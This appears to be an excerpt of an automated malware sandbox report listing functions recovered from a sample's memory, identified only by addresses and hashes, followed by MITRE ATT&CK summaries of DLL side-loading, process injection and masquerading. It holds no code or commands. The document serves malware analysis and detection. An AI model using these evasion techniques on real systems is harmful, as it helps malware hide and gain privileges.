Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b07e12d01c42e867f9c02199620f0308d87ae7f9b47c3d054320094bf53d134
Instruction ID: f6fdfdc06a0cb15faeee39c00f797a351ba0b53fb4c9d06ae9f37f8135464204
Opcode Fuzzy Hash: 8b07e12d01c42e867f9c02199620f0308d87ae7f9b47c3d054320094bf53d134
Instruction Fuzzy Hash: 257159347406258FCB14DF69C884B6E7BE6AF89704B1506A9E806DB3B1DF70DD45CB60

Function 02C2F5CC Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24029b2c7294e28d7b81651f93a53f7b26a3433ed094ea879ae71cc9321a2f4a
Instruction ID: 717b8bd89e233e3a4bbb5718ebd62f016837591ae1da75df618b8ef5f590d69e
Opcode Fuzzy Hash: 24029b2c7294e28d7b81651f93a53f7b26a3433ed094ea879ae71cc9321a2f4a
Instruction Fuzzy Hash: AB51DF34D0031CDFEB14DFA5D858AAEBBB2FF88300F608129E805AB2A4DB356945DF50

Function 02C29C30 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ce9cd2022900b0affc6cc0154e11638580a8a29aa76e9d97307fb0eca7bcee9
Instruction ID: 8f8ef72ce3bdb7d4ac9b920b92f24218a5377982e0064bca6df59a72bf3060dd
Opcode Fuzzy Hash: 7ce9cd2022900b0affc6cc0154e11638580a8a29aa76e9d97307fb0eca7bcee9
Instruction Fuzzy Hash: 7D51BD307002659FDB00DF69C844BAABBEAEFC9311F248466E908CB355DB71DD06DBA1

Function 02C241A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be6d72987aba8a4df9e3da3f9ffa22f4a0008d469f6fec1ab9e6b52f0dc3f29a
Instruction ID: 1a821d1baae6844b8afe4255490f7a04f8761d6a9c31b084a457edd63d720b9d
Opcode Fuzzy Hash: be6d72987aba8a4df9e3da3f9ffa22f4a0008d469f6fec1ab9e6b52f0dc3f29a
Instruction Fuzzy Hash: 9251A674E01318CFCB08DFAAD58499DBBF2FF89314B608569E809AB364DB35A845CF50

Function 02C2AEBA Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7242916f12733f34aa793d1ef75d468e100383a817738162ec6d3904aadaf1b3
Instruction ID: c95c5da5c10d8f07e14c96c084f300a56f8958ae7dd660262b837e80192806a8
Opcode Fuzzy Hash: 7242916f12733f34aa793d1ef75d468e100383a817738162ec6d3904aadaf1b3
Instruction Fuzzy Hash: C941CE75B002108FCB05ABA5D818B6EBBF2BFC8605F144969E606DB391DF35DD06CB90

Function 02C2A303 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbf2cd9bd1f30e00f79df4175a2f495931c78dbda6abc67bc1dc0deae3b85507
Instruction ID: f144ad10b23baff6b50048267a4523dc319e8211f8d02b6765ae1b25fdafde32
Opcode Fuzzy Hash: dbf2cd9bd1f30e00f79df4175a2f495931c78dbda6abc67bc1dc0deae3b85507
Instruction Fuzzy Hash: 4141B331A00269DFCF15CFA9C948B9EBFB2FF89314F048555E909AB2A5D734E918CB50

Function 02C26FC8 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dd4da47a4309a35d9bdb20f993f2b53560378e75bb2ae5c323da11aa1fbf204
Instruction ID: 3bda07d0fdcfb53ac153067a962ccde8b736027b14d5577309ce2c76a70cfecd
Opcode Fuzzy Hash: 1dd4da47a4309a35d9bdb20f993f2b53560378e75bb2ae5c323da11aa1fbf204
Instruction Fuzzy Hash: 1841DF30A00258DFCB11CF65C988B6ABBB6EB84304F05846AE815DB251DB79DE4DCBA1

Function 02C23CC0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c8d90f47e064e31f6ad5961ad8f19f25bf91f5dbfb4b26f735c675d1289af99
Instruction ID: c7d64baf227afeb0543e386a7f5fc07dc9cd91376580e803030661d84aa7fbdc
Opcode Fuzzy Hash: 5c8d90f47e064e31f6ad5961ad8f19f25bf91f5dbfb4b26f735c675d1289af99
Instruction Fuzzy Hash: 4D31D331B103B587DF1856AA9C9837EA6A6EBC4205F14457AF806D3380EF7DCD4987A1

Function 02C25658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fc802a2c8b8b346a7e99ed05c5047e8f27462620e122aef375cc2c67bf6ce0c
Instruction ID: c86b15c694f11e0a84be3ddc22445e67a57ce35bfb22b732c49d7a0b413c2241
Opcode Fuzzy Hash: 4fc802a2c8b8b346a7e99ed05c5047e8f27462620e122aef375cc2c67bf6ce0c
Instruction Fuzzy Hash: 13319D31641169EFCF159FA5D848AAF3BA2EB88744F404924F919CB384CF35CE65DBA0

Function 02C28EF8 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ebdee1b7f86699b67d649e666cf315a283a040cdfe69321a361eeca165db9a9
Instruction ID: 1695947ab7add9b03daa994e6fd93b15ec0cbfd48d3bdf1894e49b32633e7467
Opcode Fuzzy Hash: 9ebdee1b7f86699b67d649e666cf315a283a040cdfe69321a361eeca165db9a9
Instruction Fuzzy Hash: 12318F303402628FDB25DB69885473E7766BFC4601B24465AE016DB292EF3ACD84C7A5

Function 02C28380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8e186953ddf7ee9f6e9efb4df2490d13a5fa495beef00231a4f9e8f8b87a64c
Instruction ID: 28b48eb9dae5c23934abcd0ea95fb7612409cab48e2aab229a354c84e19fd20b
Opcode Fuzzy Hash: d8e186953ddf7ee9f6e9efb4df2490d13a5fa495beef00231a4f9e8f8b87a64c
Instruction Fuzzy Hash: 9B21D1303042228BEF145A768474B3E7697AFC4B59F148239D402CB798EF76CD46E7A1

Function 02C262F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d74c68575c1448d8b854a5f38280be24bf789c41fc205b4d6172ac036293de6
Instruction ID: 492f438bb2a18b72e4e85563d85a5809d3cb7b6f0e5d83d3541dfc7a85372a8c
Opcode Fuzzy Hash: 3d74c68575c1448d8b854a5f38280be24bf789c41fc205b4d6172ac036293de6
Instruction Fuzzy Hash: F5214631701A31CFC7259A2AC45862EB7A6FFC97557244669E81ACB394CF31CC06CBA0

Function 02C228F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6943c86994023ba64c8b23bd4bae2fef8fc6941d9ed05132bfc008ba57f4b330
Instruction ID: 032f45b290d78d08ab06bd3c7fee74fbd82b103de87726246d2b2e503ca787f3
Opcode Fuzzy Hash: 6943c86994023ba64c8b23bd4bae2fef8fc6941d9ed05132bfc008ba57f4b330
Instruction Fuzzy Hash: D421B071A00125DFCF14EB64C884AAE37A5EB9D260B10C51DD809AB280DF32EE4ACBD1

Function 00FED554 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3864401716.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fed000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5ec19050a94426c096fb6b2cedca99f884f59633c20824889c4f81d36f6b95f
Instruction ID: 62406dcfdbd5f2b105effe7c8574518c8681c086202507ff8977edf26a67f6f1
Opcode Fuzzy Hash: a5ec19050a94426c096fb6b2cedca99f884f59633c20824889c4f81d36f6b95f
Instruction Fuzzy Hash: 04213776904380DFDB04DF14D9C0F26BF66FB88324F24C569E8090BA46C336D856EBA2

Function 00FFD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3864450816.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ffd000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90995e6cd9b288d713be8c72bbd73db8aeb67d1f7b577f7684d1f956ea6cef98
Instruction ID: 4f0389bc6c8adc36699b905a852bab69ba01e18bad6cb4197de3dafe4f4833c6
Opcode Fuzzy Hash: 90995e6cd9b288d713be8c72bbd73db8aeb67d1f7b577f7684d1f956ea6cef98
Instruction Fuzzy Hash: 742125726043089FDB10DF10C9C4B26BB66FF84324F20C56DEA494B366CB36D846EA62

Function 02C25649 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b90d2e39c3c1e06c784fd5b70217897aa3898209ac9fa68256bf55421a1f31e
Instruction ID: c4e6ca74d6fadf6db5aa0b588a0180fb0f69f178e2f58c81139e1a040cb64c71
Opcode Fuzzy Hash: 2b90d2e39c3c1e06c784fd5b70217897aa3898209ac9fa68256bf55421a1f31e
Instruction Fuzzy Hash: 6B21F371601169DFCB15AF65D848B6F3BA2EB84354F404564F905CB384CF39CE69CB90

Function 02C29761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a43fd35c81dbb699376780a20309261a173e8053c8a8ae4687f823ce6ce8e72f
Instruction ID: dd3e169e80d4e76eca6c0ced0241d52b4e26c1671c574fd10aafc63748b99d31
Opcode Fuzzy Hash: a43fd35c81dbb699376780a20309261a173e8053c8a8ae4687f823ce6ce8e72f
Instruction Fuzzy Hash: 90217C70E01258DFDB05CFA6D550AEEBFB6EF88304F248569E415E7290DB31DA45DB20

Function 02C2AEF0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91a2259797e9d20f3769f595b85eb390b62639bbc4c06b90d1de914c1b03788e
Instruction ID: bb296267c37e83f75174ee32dfa681343b1ca1bcc2baf675de3bb063627ddafe
Opcode Fuzzy Hash: 91a2259797e9d20f3769f595b85eb390b62639bbc4c06b90d1de914c1b03788e
Instruction Fuzzy Hash: B111AC76B01218ABCB00CF68D844B9EBBB6FB8C310F144529E916E7290DB32AC14CB90

Function 02C26300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50eaae2a2fc3e05cd4dfd37a536d31de05e33b4cd0c101e7766cd95c81ec6ad7
Instruction ID: 82ae3a6f8ad35735ff20b7673df73a9a64acf87f44c16cdc1c4b9db734adfc80
Opcode Fuzzy Hash: 50eaae2a2fc3e05cd4dfd37a536d31de05e33b4cd0c101e7766cd95c81ec6ad7
Instruction Fuzzy Hash: B81104357416229FC7159A2AC498A3EB7AAFFC97653290578E81ACB350CF31DC02C7E0

Function 02C227F0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d930af73b93e36f86a01e4f79b9f842aaf258762760ec414da1ba811a0e5f1e1
Instruction ID: d6e305dde7ec8ad80a0d5c35fc1de08003542be1a0033263b5d959abcb66475e
Opcode Fuzzy Hash: d930af73b93e36f86a01e4f79b9f842aaf258762760ec414da1ba811a0e5f1e1
Instruction Fuzzy Hash: C121C075D052198FCB00EFA9D8456EEBFF4FF4A200F10566AD809B3220EB305A95CBA1

Function 02C2F4E8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d375360cfbb88d19ba5668a31e6a6814466befc5a28694c243807eb0471219b
Instruction ID: 2b334f2a1cdcb10f46013cf76aed280c39511fc2ae42eb292264f6cef5ca1572
Opcode Fuzzy Hash: 7d375360cfbb88d19ba5668a31e6a6814466befc5a28694c243807eb0471219b
Instruction Fuzzy Hash: E62158B0D0035DDFDB01EFA9D84069EBBF6FF81304F0086AAD148AB265EB305A459B81

Function 00FED54F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3864401716.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fed000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction ID: ab060aed150a8e2c0a83b95af31f5e3d8f74c79e9332d60eac2fa14c6f544af3
Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction Fuzzy Hash: 6D11D376904280CFCF15CF14D9C4B16BF72FB94324F28C5A9D8490B656C33AD856DBA2

Function 02C2F4F8 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 700e44c0aced93a25c1532a92404c100c78f546aa597573a74ebc6f2fffee105
Instruction ID: 9f4ef34742a92564ca9a6415bc2474f6c78acb60fb58fa90edaa04341cde1e66
Opcode Fuzzy Hash: 700e44c0aced93a25c1532a92404c100c78f546aa597573a74ebc6f2fffee105
Instruction Fuzzy Hash: FB114CB0D0021DDFDB04EFA9D94479EBBF6FF84304F0086A9D118AB255EB306A459F81

Function 00FFD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3864450816.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ffd000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction ID: fbbd3f90ed46f8dcd8faed53fc7a486f73b841b9898b381dc078e4808d9b4ffe
Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction Fuzzy Hash: 6C11D075904248CFDB11CF10C5C4B25BB62FF44324F24C6ADD9494B266C73AD84ADF51

Function 02C25E98 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01b0e0dadd0bf6ab14ba4ac972e0adedcfa2dfaa924294b0cdd842ad238d5af
Instruction ID: 270b5754756d0f8532eee100a708904727443afb216587db7a4a34b334493ad8
Opcode Fuzzy Hash: f01b0e0dadd0bf6ab14ba4ac972e0adedcfa2dfaa924294b0cdd842ad238d5af
Instruction Fuzzy Hash: BE01F732B402647BCB059EA99814BBF3BEBDFC9790F158019F605C7244CE368E16A794

Function 02C2ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67683dd0a421fab9df90a901ae82eb2720397697a4f5d9a3e1ae3a6ea94630d6
Instruction ID: 72f7fb8202c38a3ea7284c521ec9135ddbd8bbbbe1d0c4e7fb2313823482f9af
Opcode Fuzzy Hash: 67683dd0a421fab9df90a901ae82eb2720397697a4f5d9a3e1ae3a6ea94630d6
Instruction Fuzzy Hash: F9F02B35700A304B87155A2ED454B2AB7DEFFC8A55305407AF809C7361EF22CC07C780

Function 02C2EB79 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ef294991fc8e23459a70cb3f7af6b8c7192021e647bfaed276884b1630de207
Instruction ID: 8f93753132ac31dc6fee2435c44981ac47f7381cb71245e4d43eafee62b87e25
Opcode Fuzzy Hash: 2ef294991fc8e23459a70cb3f7af6b8c7192021e647bfaed276884b1630de207
Instruction Fuzzy Hash: D7019E74D0020EEFCB00EFA5E8449AEBBB1FB49300F104665D910A3350D7355A55EFA1

Function 00FED005 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3864401716.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fed000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ece4f78eb614fc98c4303da6ff749a3f8fcdf2275f55db15f4f628bb27bb4ad3
Instruction ID: b1787edc49c831ec5df4e0830f90bdd5d910156b9fec661df2dd771d42292ef8
Opcode Fuzzy Hash: ece4f78eb614fc98c4303da6ff749a3f8fcdf2275f55db15f4f628bb27bb4ad3
Instruction Fuzzy Hash: 3401EC711097C0AFC326CF15CC54C22BFB9EF8662071A85DAE8958F6A3C625EC45CB61

Function 00FED01F Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3864401716.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fed000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d19b84a54bb929a1cda68b45196481d5416865450c20c7d5f37daeb5ea50fce
Instruction ID: 5554b67d1096ba08c22c5d655f547951110bf8d54c9f8e19ab555ae452ffc5b8
Opcode Fuzzy Hash: 5d19b84a54bb929a1cda68b45196481d5416865450c20c7d5f37daeb5ea50fce
Instruction Fuzzy Hash: 4BF0FF76600644AF9724CF06D884C27FBADEFC4770719C55AE9494B652C671EC42CEA0

Function 02C228A1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbd325e28f971c8969dd052385aaeeecff093e33f01c753d6a747c608ef65c30
Instruction ID: 59d5a115e044a1689a0372131b24571ffe7f280ce5b128f60723cfc1fc0b5533
Opcode Fuzzy Hash: cbd325e28f971c8969dd052385aaeeecff093e33f01c753d6a747c608ef65c30
Instruction Fuzzy Hash: 49E02072D54356CBC701D7F0DC540EEBB34ADD2121758455BC061370A0EB301219C391

Function 02C228B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0df3142e216c27d7ca214bbf8f959b7d4de428cd40f5d01ba6a0a47e0d838f8
Instruction ID: e8071344c1759f604ed9db9e60af2667971d76bf36252c2dac849e7754d7ad73
Opcode Fuzzy Hash: d0df3142e216c27d7ca214bbf8f959b7d4de428cd40f5d01ba6a0a47e0d838f8
Instruction Fuzzy Hash: 8BD05B31D2022B97CB10E7A5DC044DFF73CEED5261B904626D52537150FB712659C6E1

Function 02C26739 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be64bc90987937b34b968e17190a7287022e86592e2991b66769ccd1059d311b
Instruction ID: 385cbc788520cc4eac22567a4968e78db521ee79d0e5e95cf6107fdef359b85f
Opcode Fuzzy Hash: be64bc90987937b34b968e17190a7287022e86592e2991b66769ccd1059d311b
Instruction Fuzzy Hash: 38D05E314443A94EDB42A7B6BC097663FA9AB81208F05AB64E4880565FDF7818619B51

Function 02C2AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a7a59dcdf457fc018e64ce10df4a8b741b1eddff3348ebbd2c4e65476afce81
Instruction ID: 1eb80cf81a2679cfe2199e663ea434902dc337be593d5c000d646af131a0a341
Opcode Fuzzy Hash: 9a7a59dcdf457fc018e64ce10df4a8b741b1eddff3348ebbd2c4e65476afce81
Instruction Fuzzy Hash: B0D0673AB400089FCB049F99E8409DDF7B6FB98221B048516E915E3264C6319925DB60

Function 02C26748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f91534b5b31d93ed4f1493a18e3798b54d76b7fae9e1eb6b1d2b86bc09e6cfd3
Instruction ID: 94e00051ca51edb79037d6a33577700a3c3b89355537a9d32c7d4127b9c19cd6
Opcode Fuzzy Hash: f91534b5b31d93ed4f1493a18e3798b54d76b7fae9e1eb6b1d2b86bc09e6cfd3
Instruction Fuzzy Hash: D5C012304403284FDA51F7E6FC49615375AFBC06097409B14A4090664EDF7929954B95

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

